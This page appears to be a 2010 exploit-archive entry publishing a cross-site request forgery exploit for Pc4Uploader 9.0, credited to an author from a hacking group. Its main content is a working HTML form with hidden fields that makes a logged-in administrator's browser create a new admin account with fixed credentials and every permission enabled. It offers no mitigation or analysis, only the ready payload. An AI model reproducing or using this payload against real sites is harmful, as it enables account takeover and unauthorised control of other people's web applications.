Pc4Uploader 9.0 Cross-site Request Forgery

Posted on 27 August 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Pc4Uploader 9.0 Cross-site Request Forgery</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>==========================================
Pc4Uploader 9.0 Cross-site Request Forgery
==========================================

# Exploit Title: pc4uploader [XSRF] Add Admin Exploit# Date: 27-08-2010# Author: RENO
# TeaM : SauDi ViRuS TeaM
# SiTe: WwW.Sa-ViRuS.CoM
# Software Link: http://www.pc4arb.com/product-10.html
 
&lt;html&gt;
&lt;title&gt;[SvT]&lt;/title&gt;
&lt;body bgcolor=&quot;#000000&quot; style=&quot;background-attachment: fixed&quot; background=&quot;http://www.sa-virus.com/reno/bg.gif&quot;&gt;
&lt;p
 align=&quot;left&quot;&gt;&lt;font size=&quot;5&quot;
color=&quot;#FFFFFF&quot;&gt;&lt;b&gt;                                
  
                
&lt;/b&gt;&lt;/font&gt;&lt;b&gt;&lt;font color=&quot;#FFFFFF&quot; size=&quot;5&quot;&gt;Pc4Uploader - [XSRF ] Add Admin
Exploit&lt;br&gt;
                                                                   
     
Author : RENO&lt;br&gt;
                                                          
     TeaM : SauDi ViRuS TeaM&lt;br&gt;
                                                            
     
Site : &lt;a href=&quot;http://WwW.Sa-ViRuS.CoM&quot;&gt;WwW.Sa-ViRuS.CoM&lt;/a&gt;&lt;br&gt;
                                                        
       
Email : R7e@HoTMaiL.coM&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
&lt;p align=&quot;center&quot;&gt; &lt;/p&gt;
&lt;p align=&quot;center&quot;&gt; &lt;/p&gt;
 
&lt;svt&gt;
&lt;center&gt;
 
&lt;form method=&quot;POST&quot; name=&quot;form&quot; action=&quot;http://localhost/path/admin/index.php?mod=account&amp;add=saveadmin&quot;&gt;
&lt;input type=&quot;hidden&quot; name=&quot;username&quot; value=&quot;R3NO&quot;/&gt;
&lt;input type=&quot;hidden&quot; name=&quot;password&quot; value=&quot;SauDi_ViRuS_TeaM&quot;/&gt;
&lt;input type=&quot;hidden&quot; name=&quot;email&quot; value=&quot;R7e@HoTMaiL.CoM&quot;/&gt;
&lt;input type=&quot;hidden&quot; name=&quot;setting_rols&quot; value=&quot;1&quot;/&gt;
&lt;input type=&quot;hidden&quot; name=&quot;member_rols&quot; value=&quot;1&quot;/&gt;
&lt;input type=&quot;hidden&quot; name=&quot;files_rols&quot; value=&quot;1&quot;/&gt;
&lt;input type=&quot;hidden&quot; name=&quot;msg_rols&quot; value=&quot;1&quot;/&gt;
&lt;input type=&quot;hidden&quot; name=&quot;news_rols&quot; value=&quot;1&quot;/&gt;
&lt;input type=&quot;hidden&quot; name=&quot;advs_rols&quot; value=&quot;1&quot;/&gt;
&lt;input type=&quot;hidden&quot; name=&quot;links_rols&quot; value=&quot;1&quot;/&gt;
&lt;input type=&quot;hidden&quot; name=&quot;support_rols&quot; value=&quot;1&quot;/&gt;
&lt;input type=submit value=&quot;Submit&quot;&gt;
&lt;/p&gt;
 
&lt;/form&gt;
&lt;/svt&gt;
 
 
&lt;/center&gt;
&lt;/html&gt;  


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-08-27]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
TOP
Malware :

Last 20
Exploits :

Last 20